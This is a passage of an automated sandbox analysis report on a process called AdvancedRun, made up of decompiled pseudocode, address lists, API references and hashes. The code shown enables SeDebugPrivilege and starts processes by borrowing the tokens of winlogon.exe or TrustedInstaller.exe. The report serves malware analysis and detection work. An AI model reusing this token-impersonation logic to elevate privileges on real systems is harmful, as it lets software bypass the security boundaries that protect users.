					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                  0x004022d5
                                                                  0x004022dd
                                                                  0x004022e7
                                                                  0x004022ec
                                                                  0x004022f7
                                                                  0x004022fa
                                                                  0x004022fd
                                                                  0x00402300
                                                                  0x00402307
                                                                  0x0040230d
                                                                  0x0040230e
                                                                  0x00402318
                                                                  0x00402321
                                                                  0x00402324
                                                                  0x00402327
                                                                  0x0040232a
                                                                  0x0040232d
                                                                  0x00402334
                                                                  0x00402337
                                                                  0x0040233e
                                                                  0x0040234f
                                                                  0x00402356
                                                                  0x0040235b
                                                                  0x0040235e
                                                                  0x0040236d
                                                                  0x00402374
                                                                  0x0040237e
                                                                  0x00402395
                                                                  0x004023a0
                                                                  0x004023a0
                                                                  0x004023ac
                                                                  0x004023cf
                                                                  0x004023d2
                                                                  0x004023d9
                                                                  0x004023de
                                                                  0x004023f6
                                                                  0x00402403
                                                                  0x00402414
                                                                  0x00402419
                                                                  0x00402403
                                                                  0x0040241a
                                                                  0x00402423
                                                                  0x00402458
                                                                  0x0040245d
                                                                  0x00402464
                                                                  0x00402467
                                                                  0x00402468
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402425
                                                                  0x00402428
                                                                  0x0040242b
                                                                  0x00402433
                                                                  0x00402434
                                                                  0x00402473
                                                                  0x00402473
                                                                  0x0040247c
                                                                  0x00402481
                                                                  0x00402488
                                                                  0x00402488
                                                                  0x00402495
                                                                  0x0040249a
                                                                  0x004024b7
                                                                  0x004024be
                                                                  0x004024cd
                                                                  0x004024d1
                                                                  0x004024ed
                                                                  0x004024f0
                                                                  0x00402506
                                                                  0x0040250b
                                                                  0x00402512
                                                                  0x00402518
                                                                  0x00402519
                                                                  0x0040251e
                                                                  0x00402524
                                                                  0x00402527
                                                                  0x0040252b
                                                                  0x00402530
                                                                  0x00402531
                                                                  0x00402531
                                                                  0x0040253d
                                                                  0x0040255a
                                                                  0x00402561
                                                                  0x00402570
                                                                  0x00402574
                                                                  0x00402590
                                                                  0x00402593
                                                                  0x004025a9
                                                                  0x004025ae
                                                                  0x004025b5
                                                                  0x004025bb
                                                                  0x004025bc
                                                                  0x004025c1
                                                                  0x004025c7
                                                                  0x004025ca
                                                                  0x004025cd
                                                                  0x004025ce
                                                                  0x004025d4
                                                                  0x004025d4
                                                                  0x004025da
                                                                  0x004025e3
                                                                  0x004025eb
                                                                  0x00402633
                                                                  0x004025fb
                                                                  0x00402608
                                                                  0x0040260f
                                                                  0x00402614
                                                                  0x00402624
                                                                  0x00402630
                                                                  0x00402630
                                                                  0x0040263a
                                                                  0x0040263b
                                                                  0x00402646
                                                                  0x0040264b
                                                                  0x0040264c
                                                                  0x0040265a
                                                                  0x0040265a
                                                                  0x0040265d
                                                                  0x00402666
                                                                  0x00402668
                                                                  0x00402668
                                                                  0x00402672
                                                                  0x00402675
                                                                  0x0040267e
                                                                  0x0040267e
                                                                  0x00402683
                                                                  0x0040268b
                                                                  0x0040269e
                                                                  0x0040269e
                                                                  0x004026a3
                                                                  0x004026ac
                                                                  0x004026b5
                                                                  0x004026b8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004026ba
                                                                  0x00000000
                                                                  0x004026ae
                                                                  0x004026ae
                                                                  0x004026bf
                                                                  0x004026c1
                                                                  0x004026c6
                                                                  0x004026cc
                                                                  0x004026d5
                                                                  0x004026db
                                                                  0x004026e4
                                                                  0x004026ea
                                                                  0x004026f3
                                                                  0x004026f9
                                                                  0x00402707
                                                                  0x00402707
                                                                  0x0040270d
                                                                  0x00402710
                                                                  0x0040276d
                                                                  0x00402770
                                                                  0x0040280b
                                                                  0x0040280e
                                                                  0x00402813
                                                                  0x00402810
                                                                  0x00402810
                                                                  0x00402810
                                                                  0x00402819
                                                                  0x0040281f
                                                                  0x00402836
                                                                  0x00402841
                                                                  0x00402846
                                                                  0x0040284a
                                                                  0x00402851
                                                                  0x00402857
                                                                  0x00402860
                                                                  0x00402865
                                                                  0x00402876
                                                                  0x00402879
                                                                  0x00402888
                                                                  0x00402888
                                                                  0x00402857
                                                                  0x00402891
                                                                  0x0040289c
                                                                  0x0040289c
                                                                  0x00402779
                                                                  0x00402784
                                                                  0x0040278d
                                                                  0x004027a4
                                                                  0x004027b3
                                                                  0x004027b8
                                                                  0x004027bb
                                                                  0x004027bf
                                                                  0x004027c6
                                                                  0x004027c6
                                                                  0x004027d1
                                                                  0x004027d6
                                                                  0x004027d9
                                                                  0x004027db
                                                                  0x004027e2
                                                                  0x004027e4
                                                                  0x004027e4
                                                                  0x004027e7
                                                                  0x004027f4
                                                                  0x004027fc
                                                                  0x00402801
                                                                  0x00402801
                                                                  0x00402803
                                                                  0x00402803
                                                                  0x00402806
                                                                  0x00000000
                                                                  0x00402806
                                                                  0x00402715
                                                                  0x00402729
                                                                  0x0040272e
                                                                  0x00402731
                                                                  0x00402738
                                                                  0x00402738
                                                                  0x00402743
                                                                  0x00402748
                                                                  0x0040274d
                                                                  0x00402754
                                                                  0x00402756
                                                                  0x00402756
                                                                  0x00402759
                                                                  0x00402763
                                                                  0x00000000
                                                                  0x00402763
                                                                  0x004026fb
                                                                  0x00402700
                                                                  0x00402702
                                                                  0x00000000
                                                                  0x00402702
                                                                  0x004026ec
                                                                  0x00000000
                                                                  0x004026ec
                                                                  0x004026dd
                                                                  0x00000000
                                                                  0x004026dd
                                                                  0x004026ce
                                                                  0x00000000
                                                                  0x004026ce
                                                                  0x004026ac
                                                                  0x00402443
                                                                  0x0040246a
                                                                  0x00402470
                                                                  0x00000000
                                                                  0x00402470

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402300
                                                                  • memset.MSVCRT ref: 0040233E
                                                                  • memset.MSVCRT ref: 00402356
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                  • wcschr.MSVCRT ref: 00402387
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                  • memset.MSVCRT ref: 004023D9
                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                  • memset.MSVCRT ref: 004024BE
                                                                  • memset.MSVCRT ref: 004024D1
                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                  • memset.MSVCRT ref: 00402561
                                                                  • memset.MSVCRT ref: 00402574
                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                  • memset.MSVCRT ref: 0040260F
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                  • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                  • API String ID: 2452314994-435178042
                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 89%
                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                  0x00408533
                                                                  0x00408533
                                                                  0x00408536
                                                                  0x0040853e
                                                                  0x00408546
                                                                  0x0040854d
                                                                  0x00408559
                                                                  0x00408563
                                                                  0x00408569
                                                                  0x00408572
                                                                  0x00408583
                                                                  0x0040858d
                                                                  0x00408595
                                                                  0x0040859e
                                                                  0x004085a2
                                                                  0x004085a6
                                                                  0x004085aa
                                                                  0x004085ae
                                                                  0x004085b8
                                                                  0x004085c1
                                                                  0x004085c8
                                                                  0x004085cd
                                                                  0x004085cf
                                                                  0x0040867f
                                                                  0x00408688
                                                                  0x0040868d
                                                                  0x0040868f
                                                                  0x00408730
                                                                  0x00408735
                                                                  0x00408737
                                                                  0x0040873d
                                                                  0x00408750
                                                                  0x0040875d
                                                                  0x00408763
                                                                  0x00408770
                                                                  0x00408775
                                                                  0x00408779
                                                                  0x0040878b
                                                                  0x00408790
                                                                  0x004087a2
                                                                  0x004087aa
                                                                  0x004087b8
                                                                  0x004087be
                                                                  0x004087c3
                                                                  0x004087c9
                                                                  0x004087d2
                                                                  0x004087df
                                                                  0x004087e3
                                                                  0x004087e6
                                                                  0x00408801
                                                                  0x004087e8
                                                                  0x004087f8
                                                                  0x004087fe
                                                                  0x00408811
                                                                  0x00408816
                                                                  0x00408816
                                                                  0x0040881c
                                                                  0x00408822
                                                                  0x00408779
                                                                  0x00408824
                                                                  0x00408829
                                                                  0x00408833
                                                                  0x00408834
                                                                  0x00408840
                                                                  0x00408848
                                                                  0x0040884c
                                                                  0x00408850
                                                                  0x00408855
                                                                  0x0040885a
                                                                  0x00408860
                                                                  0x004088ac
                                                                  0x004088b1
                                                                  0x004088b3
                                                                  0x004088bf
                                                                  0x004088c5
                                                                  0x004088cb
                                                                  0x004088da
                                                                  0x004088ea
                                                                  0x004088ed
                                                                  0x004088f8
                                                                  0x004088ff
                                                                  0x00408905
                                                                  0x004088b5
                                                                  0x004088b5
                                                                  0x004088b5
                                                                  0x00000000
                                                                  0x00408862
                                                                  0x00408862
                                                                  0x0040886d
                                                                  0x00408874
                                                                  0x0040887b
                                                                  0x00408882
                                                                  0x00408889
                                                                  0x00408895
                                                                  0x00408897
                                                                  0x00408658
                                                                  0x00408658
                                                                  0x0040865d
                                                                  0x00408661
                                                                  0x0040866a
                                                                  0x00408673
                                                                  0x00408678
                                                                  0x00000000
                                                                  0x00408678
                                                                  0x00408860
                                                                  0x00408695
                                                                  0x00408695
                                                                  0x0040869f
                                                                  0x004086a2
                                                                  0x004086af
                                                                  0x004086a4
                                                                  0x004086a7
                                                                  0x004086a7
                                                                  0x004086b4
                                                                  0x004086bf
                                                                  0x004086cb
                                                                  0x004086d3
                                                                  0x004086d7
                                                                  0x004086db
                                                                  0x004086e0
                                                                  0x004086f1
                                                                  0x004086f8
                                                                  0x004086ff
                                                                  0x00408706
                                                                  0x0040870d
                                                                  0x00408719
                                                                  0x0040871b
                                                                  0x00000000
                                                                  0x0040871b
                                                                  0x004085d5
                                                                  0x004085da
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004085ec
                                                                  0x004085ef
                                                                  0x004085f6
                                                                  0x004085fd
                                                                  0x00408604
                                                                  0x0040860b
                                                                  0x00408612
                                                                  0x00408616
                                                                  0x00408620
                                                                  0x0040862a
                                                                  0x00408632
                                                                  0x00408633
                                                                  0x00408638
                                                                  0x0040864a
                                                                  0x0040864f
                                                                  0x00408651
                                                                  0x00000000
                                                                  0x0040854f
                                                                  0x0040854f
                                                                  0x00408550
                                                                  0x00408556
                                                                  0x00408556

                                                                  APIs
                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                  • swscanf.MSVCRT ref: 00408620
                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                  • API String ID: 3933224404-3784219877
                                                                  • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                  • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 210 401fe6-402002 211 4020a8-4020ab 210->211 212 402008-40206e memset * 2 call 404c3c wcslen * 2 210->212 213 4020f3-4020f6 211->213 214 4020ad-4020bc wcslen 211->214 221 402070-402089 call 404be4 212->221 222 40208b 212->222 217 402162-402165 213->217 218 4020f8-402105 call 40598b 213->218 219 4020c2-4020d5 call 404ea9 214->219 220 4022cb-4022d2 214->220 223 4021f2-4021f5 217->223 224 40216b-40217b OpenSCManagerW 217->224 218->220 240 40210b-402114 call 401e44 218->240 243 4020e6-4020e7 call 401df9 219->243 244 4020d7-4020e4 _wtoi call 401e44 219->244 232 402092-4020a6 call 401df9 221->232 222->232 228 402235-402238 223->228 229 4021f7-402203 call 401d99 223->229 230 402184-402192 call 401f04 224->230 231 40217d-40217e call 401306 224->231 241 4022a0-4022be CreateProcessW 228->241 242 40223a-402254 228->242 229->220 256 402209-402227 call 40a46c 229->256 230->220 258 402198-4021ac call 401df9 230->258 247 402183 231->247 259 402119-40211b 232->259 240->259 248 4022c0 241->248 252 402266-402276 call 40289f 242->252 253 402256-402262 wcschr 242->253 255 4020ec-4020f1 243->255 244->255 247->230 248->220 257 4022c2 GetLastError 248->257 268 402278-402298 252->268 269 40229a 252->269 253->252 260 402264 253->260 263 40211e 255->263 256->220 274 40222d-402230 256->274 265 4022c8 257->265 275 4021e7-4021ed RevertToSelf 258->275 276 4021ae-4021d3 call 4028ed 258->276 259->263 260->252 263->220 272 402124-402149 call 4028ed 263->272 265->220 273 40229c-40229e 268->273 269->273 282 402154-40215d CloseHandle 272->282 283 40214b-402151 GetLastError 272->283 273->248 274->265 275->220 284 4021d5-4021db GetLastError 276->284 285 4021de-4021e1 CloseHandle 276->285 282->220 283->282 284->285 285->275
                                                                  C-Code - Quality: 81%
                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                  0x00401fe6
                                                                  0x00401ff1
                                                                  0x00401ff3
                                                                  0x00401fff
                                                                  0x00402002
                                                                  0x004020a8
                                                                  0x004020ab
                                                                  0x004020f3
                                                                  0x004020f6
                                                                  0x00402162
                                                                  0x00402165
                                                                  0x004021f2
                                                                  0x004021f5
                                                                  0x00402235
                                                                  0x00402238
                                                                  0x004022be
                                                                  0x0040223a
                                                                  0x0040223a
                                                                  0x00402240
                                                                  0x0040224b
                                                                  0x0040224e
                                                                  0x00402251
                                                                  0x00402254
                                                                  0x00402259
                                                                  0x0040225e
                                                                  0x00402262
                                                                  0x00402264
                                                                  0x00402264
                                                                  0x00402264
                                                                  0x00402262
                                                                  0x00402266
                                                                  0x0040226c
                                                                  0x00402271
                                                                  0x00402274
                                                                  0x00402276
                                                                  0x0040229a
                                                                  0x0040229a
                                                                  0x00402278
                                                                  0x00402296
                                                                  0x00402296
                                                                  0x0040229c
                                                                  0x0040229c
                                                                  0x004022c0
                                                                  0x004022c2
                                                                  0x004022c8
                                                                  0x004022c8
                                                                  0x004022c8
                                                                  0x00000000
                                                                  0x004022c0
                                                                  0x00402201
                                                                  0x00402203
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402220
                                                                  0x00402225
                                                                  0x00402227
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040222d
                                                                  0x00000000
                                                                  0x0040222d
                                                                  0x00402173
                                                                  0x00402179
                                                                  0x0040217b
                                                                  0x0040217e
                                                                  0x00402183
                                                                  0x00402185
                                                                  0x00402188
                                                                  0x0040218d
                                                                  0x0040218f
